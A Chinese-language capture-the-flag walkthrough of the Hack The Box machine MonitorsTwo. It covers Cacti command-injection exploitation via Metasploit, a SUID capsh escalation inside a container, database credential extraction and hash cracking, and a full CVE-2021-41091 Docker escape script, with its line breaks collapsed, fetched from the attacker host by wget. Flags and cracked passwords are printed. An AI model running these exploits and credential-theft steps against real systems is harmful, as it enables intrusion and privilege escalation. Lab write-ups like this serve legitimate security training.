HTB：MonitorsTwo[WriteUP]

连接至HTB服务器并启动靶机

靶机IP：10.10.11.211

分配IP：10.10.16.7

信息搜集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a 10.10.11.211 -r 1-65535

使用nmap对靶机开放端口进行脚本、服务扫描

nmap -p 22,80 -sCV 10.10.11.211

漏洞利用

使用浏览器访问靶机80端口

由登录界面下方注释可知，当前WebAPP为：Cacti 1.2.22

使用searchsploit搜索该WebAPP漏洞

searchsploit Cacti 1.2.22

启动Metasploit利用该漏洞

msfconsole

搜索该WebAPP相关利用模块

search Cacti 1.2.22

切换到该模块

use exploit/linux/http/cacti_unauthenticated_cmd_injection

需要配置选项：PAYLOAD、LHOST、LPORT、RHOSTS、RPORT

执行命令exploit或run即可getshell

特权提升

提升TTY

script -c /bin/bash -q /dev/null

查看根目录下所有文件，可见文件：.dockerenv这意味着我们在docker容器中

ls -a /

www-data@50bca5e748b0:/var/tmp$ ls -a /
ls -a /
.           bin   entrypoint.sh lib    mnt   root srv usr
..          boot etc            lib64 opt   run   sys var
.dockerenv dev   home           media proc sbin tmp

通过Meterpreter上传一个linpeas.sh到容器中

upload linpeas.sh

meterpreter > upload linpeas.sh
[*] Uploading : /home/kali/Desktop/temp/linpeas.sh -> linpeas.sh
[*] Uploaded -1.00 B of 805.42 KiB (0.0%): /home/kali/Desktop/temp/linpeas.sh -> linpeas.sh
[*] Completed : /home/kali/Desktop/temp/linpeas.sh -> linpeas.sh

为linpeas.sh文件赋权

chmod 777 linpeas.sh

meterpreter > shell
Process 12228 created.
Channel 215 created.
script -c /bin/bash -q /dev/null
www-data@50bca5e748b0:/var/tmp$ ls
ls
linpeas.sh
www-data@50bca5e748b0:/var/tmp$ ls -l linpeas.sh
ls -l linpeas.sh
-rw-r--r-- 1 www-data www-data 824745 Nov 19 13:21 linpeas.sh
www-data@50bca5e748b0:/var/tmp$ chmod 777 linpeas.sh
chmod 777 linpeas.sh

直接运行该脚本

./linpeas.sh

在扫描到的SUID文件一栏存在/sbin/capsh文件

在GTFOBins中搜索该文件

尝试直接在容器中提权到root用户

/sbin/capsh --gid=0 --uid=0 --

www-data@50bca5e748b0:/var/tmp$ /sbin/capsh --gid=0 --uid=0 --
/sbin/capsh --gid=0 --uid=0 --
root@50bca5e748b0:/var/tmp# whoami
whoami
root

横向移动

检索靶机中所有与配置相关的文件

find / -name '*conf*' -type f 2>/dev/null | tee res.txt

逐个文件查看内容匹配字符password

cat res.txt | xargs -I {} sh -c 'cat {} | grep -i "password"'

尝试寻找该字符串cactiuser出处

xargs -I {} sh -c 'grep -m1 "cactiuser" "{}" && echo "Found in {}"' < res.txt

root@50bca5e748b0:/var/tmp# xargs -I {} sh -c 'grep -m1 "cactiuser" "{}" && echo "Found in {}"' < res.txt
<1 "cactiuser" "{}" && echo "Found in {}"' < res.txt
#$rdatabase_username = 'cactiuser';
Found in /var/www/html/include/config.php

查看/var/www/html/include/config.php文件内容

cat /var/www/html/include/config.php

获取了数据库cacti管理员root凭证

账户：root

密码：root

使用凭证及相关信息连接到数据库

mysql -h db -u 'root' -p'root' 'cacti'

列出所有表单

SHOW TABLES;

MySQL [cacti]> SHOW TABLES;
SHOW TABLES;
+-------------------------------------+
| Tables_in_cacti                     |
+-------------------------------------+
<...SNIP...>
| snmpagent_cache_notifications       |
| snmpagent_cache_textual_conventions |
| snmpagent_managers                  |
| snmpagent_managers_notifications    |
| snmpagent_mibs                      |
| snmpagent_notifications_log         |
| user_auth                           |
| user_auth_cache                     |
| user_auth_group                     |
| user_auth_group_members             |
| user_auth_group_perms               |
| user_auth_group_realm               |
| user_auth_perms                     |
<...SNIP...>
+-------------------------------------+
111 rows in set (0.001 sec)

这里的user_auth表单引起了我的注意，直接列出该表单数据

SELECT * FROM user_auth;

账户：marcus

密码：$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C

将哈希值写入文件中

echo '$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C' > hash

使用john进行哈希爆破

john hash --wordlist=../dictionary/rockyou.txt

账户：marcus

密码：funkymonkey

使用该凭证通过SSH服务连接到靶机

ssh marcus@10.10.11.211

查找user_flag位置并查看其内容

marcus@monitorstwo:~$ find / -name 'user.txt' 2>/dev/null
/home/marcus/user.txt
marcus@monitorstwo:~$ cat /home/marcus/user.txt
3cdce88c7f2a5678a8eb5bfe4f9dbb5f

USER_FLAG：3cdce88c7f2a5678a8eb5bfe4f9dbb5f

特权提升

在/var/mail目录下找到marcus文件

国产化后

漏洞编号	影响对象	漏洞原因	可能导致后果	修复建议
CVE-2021-33033	5.11.14 版本之前的 Linux 内核	与 DOI 定义的 CIPSO 和 CALIPSO 引用计数有关，存在释放后使用问题	攻击者可写入任意值	更新内核到 5.11.14 或更高版本
CVE-2020-25706	Cacti 1.2.13 版本	xml_path 字段的模板导入预览期间错误消息转义不当	恶意代码注入网页，可能导致敏感数据被盗或会话劫持	升级到 Cacti 1.2.14 或更高版本
CVE-2021-41091	Moby（Docker 创建的用于软件容器化的开源项目）	遍历目录内容并在权限限制不足的数据目录上执行程序	权限问题被利用	更新到 Moby（Docker 引擎）20.10.9 版本，停止并重启正在运行的容器

我们已经进入了靶机系统中，而CVE-2020-25706是WebAPP漏洞所以这里不用管
其次查看靶机系统内核版本

uname -a

marcus@monitorstwo:/var/tmp$ uname -a
Linux monitorstwo 5.4.0-147-generic #164-Ubuntu SMP Tue Mar 21 14:23:17 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

5.4.0-147版本与CVE-2021-33033中受影响的5.11.14或更高版本不符

查看靶机系统内docker版本

docker -v

marcus@monitorstwo:/var/tmp$ docker -v
Docker version 20.10.5+dfsg1, build 55c4c88

由输出可见，靶机该版本docker受到CVE-2021-41091特权问题漏洞影响

尝试到Github中寻找该漏洞PoC

#!/bin/bashdocker_version=$(docker --version 2>/dev/null | awk '{print $3}' | sed 's/,//')
if [ -z "$docker_version" ]; thenecho "[x] Docker not found or an error occurred while checking the version."exit 1
fiIFS='.' read -ra ver_parts <<< "$docker_version"
IFS='.' read -ra min_parts <<< "20.10.9"is_vulnerable=true
for i in "${!ver_parts[@]}"; doif [[ "${ver_parts[i]}" -gt "${min_parts[i]}" ]]; thenis_vulnerable=falsebreakelif [[ "${ver_parts[i]}" -lt "${min_parts[i]}" ]]; thenbreakfi
doneif $is_vulnerable; thenoutput=$(findmnt 2>/dev/null)result=$(echo "$output" | grep "/var/lib/docker/overlay2" | awk '{print $1}' | sed 's/..//')if [[ "$result" =~ "/var/lib/docker/overlay2" ]]; thenecho "[!] Vulnerable to CVE-2021-41091"echo "[!] Now connect to your Docker container that is accessible and obtain root access !"echo "[>] After gaining root access execute this command (chmod u+s /bin/bash)"echo ""read -p "Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): " responseif [[ "$response" != "yes" ]]; thenecho "[x] Please set the setuid bit on /bin/bash in the Docker container and try again."exit 2fiecho "[!] Available Overlay2 Filesystems:"echo -e "$result\n"echo "[!] Iterating over the available Overlay2 filesystems !"while read -r path; doecho "[?] Checking path: $path"if cd "$path" 2>/dev/null; thenif ./bin/bash -p 2>/dev/null; thenecho "[!] Rooted !"echo "[>] Current Vulnerable Path: $(pwd)"echo "[?] If it didn't spawn a shell go to this path and execute './bin/bash -p'"echo ""echo "[!] Spawning Shell"cd "$path"exec ./bin/bash -p -ielseecho -e "[x] Could not get root access in '$path'\n"fielseecho -e "[x] Could not access or change directory to '$path'\n"fidone <<< "$result"elseecho "[x] There's no /var/lib/docker/overlay2 files ! Not vulnerable to CVE-2021-41091"fi
elseecho "[x] Docker version is greater or equal to 20.10.9, not vulnerable to CVE-2021-41091"
fi

攻击机通过python开启http服务

python -m http.server 6666

靶机通过wget将该EXP文件进行下载

wget http://10.10.16.7:6666/exp.sh -O exp.sh

为该文件赋权

chmod +x exp.sh

直接运行该EXP脚本

./exp.sh

marcus@monitorstwo:/var/tmp$ ./exp.sh
[!] Vulnerable to CVE-2021-41091
[!] Now connect to your Docker container that is accessible and obtain root access !
[>] After gaining root access execute this command (chmod u+s /bin/bash)

此处提示我们在docker容器操作root用户执行命令

chmod u+s /bin/bash

root@50bca5e748b0:/# chmod u+s /bin/bash
chmod u+s /bin/bash

回到SSH服务登录的marcus中回复EXP提问

Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): yes
[!] Available Overlay2 Filesystems:
/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged

[!] Iterating over the available Overlay2 filesystems !
[?] Checking path: /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
[x] Could not get root access in '/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged'

[?] Checking path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[!] Rooted !
[>] Current Vulnerable Path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[?] If it didn't spawn a shell go to this path and execute './bin/bash -p'

[!] Spawning Shell
bash-5.1# exit

通过EXP输出提示，我们进入它的指定目录下

cd /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged

重新启动Bash

./bin/bash -p

成功getshell

marcus@monitorstwo:/var/tmp$ cd /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
marcus@monitorstwo:/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged$ ./bin/bash -p
bash-5.1# whoami
root

查找root_flag位置并查看其内容

bash-5.1# find / -name 'root.txt'
find: ‘/proc/4515/task/4515/net’: Invalid argument
find: ‘/proc/4515/net’: Invalid argument
/root/root.txt
bash-5.1# cat /root/root.txt
3a46a93a5f2c49137b7972724fd00c05